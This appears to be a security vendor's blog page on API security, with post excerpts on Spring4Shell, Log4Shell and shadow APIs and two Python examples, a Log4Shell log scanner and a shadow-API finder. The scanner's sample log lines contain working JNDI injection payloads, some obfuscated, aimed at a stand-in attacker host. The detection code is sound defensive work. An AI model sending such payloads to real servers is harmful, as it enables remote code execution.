Category

API Security

Discovering and securing every API is one of the most difficult challenges for developers. The API security landscape is constantly evolving, with new threats and vulnerabilities emerging at a rapid pace. Since commercial API security solutions can be very expensive for organizations, it never hurts to have a look at open-source alternatives. The OSS API Firewall is the pioneer in this space, with more than 1 billion Docker pulls since its first release in October…

Quick update. There are two vulnerabilities: a 0-day in Spring Core, named Spring4Shell (very severe, exploited in the wild, no CVE yet), and another in Spring Cloud Function (less severe, CVE-2022-22963). Wallarm has rolled out an update to detect and mitigate both vulnerabilities. No additional action is required from customers running Wallarm in blocking mode. When working in monitoring mode, consider creating a virtual patch. Spring4Shell: Spring Framework is…

This is the largest vulnerability we have seen in years. You may still be vulnerable even if your project is not based on Java: many tech stacks are exposed because so many tools use Log4j, including infrastructure, dev tools, and CI/CD products. Log4Shell will be here for a while. Log4j is a basic core component that is already in use in many products, including network devices, management consoles, and enterprise software and hardware. They just…

Wallarm has rolled out an update to detect and mitigate CVE-2021-44228. No additional action is required from customers: in blocking mode, exploitation attempts are blocked automatically. When working in monitoring mode, consider creating a virtual patch. Log4Shell: a 0-day in the Java core library log4j was discovered that results in Remote Code Execution (RCE) via a simple one-line exploit carrying a JNDI URL. Given how ubiquitous this library is, the impact…
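As an added illustration for the two Log4Shell posts above (this is example code, not Wallarm's detection logic or any rule from the posts), the following Python scans access-log lines for the JNDI lookup that the one-line exploit relies on. Log4j expands `${...}` lookups recursively, so probes routinely hide the keyword behind nested lookups such as `${lower:J}` or `${::-j}`, or URL-encode the whole payload; a naive `${jndi:` string match misses those, so the example decodes and normalizes before matching. The log lines, hosts and paths are constructed for the example.

```python
import re
from typing import List
from urllib.parse import unquote

# Log4j resolves ${...} lookups innermost-first, so attackers spell "jndi" as
# ${lower:J}, ${upper:j} or ${::-j} (an unset name with a default value).
# This regex matches one innermost lookup of those three forms.
_LOOKUP_RE = re.compile(r"\$\{(?:(lower|upper):([^${}]*)|(?:[^${}:]*:)*-([^${}]*))\}")

# The lookup that actually triggers the remote class load.
_JNDI_RE = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)


def normalize_lookups(value: str, max_rounds: int = 10) -> str:
    """Collapse nested lookups, innermost first, to the literal they evaluate to."""

    def resolve(m) -> str:
        if m.group(1) == "lower":
            return m.group(2).lower()
        if m.group(1) == "upper":
            return m.group(2).upper()
        return m.group(3)  # ${name:-default} with an unset name yields the default

    for _ in range(max_rounds):  # bounded so a pathological input cannot spin forever
        resolved = _LOOKUP_RE.sub(resolve, value)
        if resolved == value:
            break
        value = resolved
    return value


def is_log4shell_probe(value: str) -> bool:
    """True if the value contains a JNDI lookup after URL-decoding and normalization."""
    return bool(_JNDI_RE.search(normalize_lookups(unquote(value))))


def scan_log_lines(lines: List[str]) -> List[str]:
    """Return the lines that carry a Log4Shell probe in any logged field."""
    return [line for line in lines if is_log4shell_probe(line)]


# Constructed sample log lines (combined log format); hosts and paths are made up.
LOG4SHELL_SAMPLE_LOG = [
    '10.0.0.5 - - "GET /api/v1/users HTTP/1.1" 200 "Mozilla/5.0"',
    '10.0.0.9 - - "GET /api/v1/users HTTP/1.1" 200 "${jndi:ldap://attacker.example/a}"',
    '10.0.0.9 - - "GET /api/v1/users HTTP/1.1" 200 "${${lower:j}ndi:${lower:l}dap://attacker.example/a}"',
    '10.0.0.9 - - "GET /api/v1/users HTTP/1.1" 200 "${${::-j}${::-n}${::-d}${::-i}:rmi://attacker.example/b}"',
    '10.0.0.9 - - "GET /api/v1/users?q=%24%7Bjndi%3Aldap%3A%2F%2Fattacker.example%2Fc%7D HTTP/1.1" 400 "curl/7.80"',
    '10.0.0.3 - - "GET /api/v1/users HTTP/1.1" 200 "${date:yyyy}"',
]

if __name__ == "__main__":
    for hit in scan_log_lines(LOG4SHELL_SAMPLE_LOG):
        print("PROBE:", hit)
```

The benign `${date:yyyy}` line is left alone because only lookups that evaluate to a literal are collapsed; in a real virtual patch you would run the same check over every request field the application logs (User-Agent, X-Forwarded-For, query parameters, JSON bodies), not only the access-log line.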

We all know how convenient it is to use tools like Sentry or Datadog for JavaScript event monitoring. They let you catch errors in real time, organize and manage the issue-resolution process, and genuinely shift operations left to developers. But Wallarm security experts warn of dangerous patterns when such tools are integrated into the UI, since they can enable almost invisible theft of private data from authenticated users. This article will explain how it could happen and…

Shadow APIs can be defined as active endpoints that you are not aware of. Some APIs are deployed but never documented. Others are services that no longer have an owner. Some are even old v2 versions that have been deprecated for years, yet are still exposed. Long story short: these APIs are not documented and not in the API catalog. Yet they pose a real threat, as they can be vulnerable. What we see as a trend…
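As an added example of the discovery step the paragraph implies (example code, not Wallarm's product logic), the following Python diffs what the edge actually serves against what the API catalog documents: it parses request lines from an access log, drops anything that matches a documented method and OpenAPI-style path template, and groups the rest by a generalized template so that `/users/42` and `/users/43` collapse to one shadow route. The catalog, hostnames and log lines are constructed for the example.

```python
import re
from collections import Counter
from typing import Dict, Iterable, Set, Tuple

# Request line inside a combined-format access-log entry.
_REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<path>\S+) HTTP/[\d.]+"')

# Path segments that are really identifiers: integers or UUIDs.
_ID_SEGMENT_RE = re.compile(
    r"^(?:\d+|[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12})$",
    re.IGNORECASE,
)


def template_to_regex(template: str) -> "re.Pattern":
    """Turn an OpenAPI-style path template (/users/{id}) into an anchored regex."""
    parts = [
        "[^/]+" if seg.startswith("{") and seg.endswith("}") else re.escape(seg)
        for seg in template.split("/")
    ]
    return re.compile("^" + "/".join(parts) + "$")


def generalize_path(path: str) -> str:
    """Replace identifier segments with {id} so many calls collapse to one template."""
    return "/".join("{id}" if _ID_SEGMENT_RE.match(seg) else seg for seg in path.split("/"))


def find_shadow_apis(
    log_lines: Iterable[str], documented: Set[Tuple[str, str]]
) -> Dict[Tuple[str, str], int]:
    """Count observed (method, path-template) pairs that match no documented route."""
    compiled = [(method, template_to_regex(tpl)) for method, tpl in documented]
    shadow: Counter = Counter()
    for line in log_lines:
        m = _REQUEST_RE.search(line)
        if not m:
            continue  # not a request line we understand; skip rather than guess
        method = m.group("method")
        path = m.group("path").split("?", 1)[0]  # query string is not part of the route
        if any(method == doc_method and rx.match(path) for doc_method, rx in compiled):
            continue
        shadow[(method, generalize_path(path))] += 1
    return dict(shadow)


# Constructed catalog: the (method, path-template) pairs an OpenAPI document lists.
DOCUMENTED_API = {
    ("GET", "/api/v3/users"),
    ("GET", "/api/v3/users/{id}"),
    ("POST", "/api/v3/orders"),
}

# Constructed access-log lines; hosts and paths are made up for the example.
API_SAMPLE_LOG = [
    '10.0.0.5 - - "GET /api/v3/users HTTP/1.1" 200',
    '10.0.0.5 - - "GET /api/v3/users?page=2 HTTP/1.1" 200',
    '10.0.0.6 - - "GET /api/v3/users/42 HTTP/1.1" 200',
    '10.0.0.7 - - "POST /api/v3/orders HTTP/1.1" 201',
    '10.0.0.8 - - "GET /api/v2/users/42 HTTP/1.1" 200',  # deprecated v2 still answering
    '10.0.0.8 - - "GET /api/v2/users/3f2a6c1e-9b4d-4e8a-a1c2-5d6e7f8a9b0c HTTP/1.1" 200',
    '10.0.0.9 - - "DELETE /api/v3/users/42 HTTP/1.1" 204',  # undocumented method on a known path
    '10.0.0.9 - - "GET /internal/debug/heap HTTP/1.1" 200',  # no owner, not in the catalog
]

if __name__ == "__main__":
    for (method, template), hits in sorted(find_shadow_apis(API_SAMPLE_LOG, DOCUMENTED_API).items()):
        print(f"{hits:4d}  {method:6s} {template}")
```

Matching on method as well as path matters: a `DELETE` on a documented `GET`-only route is just as much a shadow endpoint as a forgotten `/api/v2` tree, and is the kind of gap an auth review is most likely to have skipped.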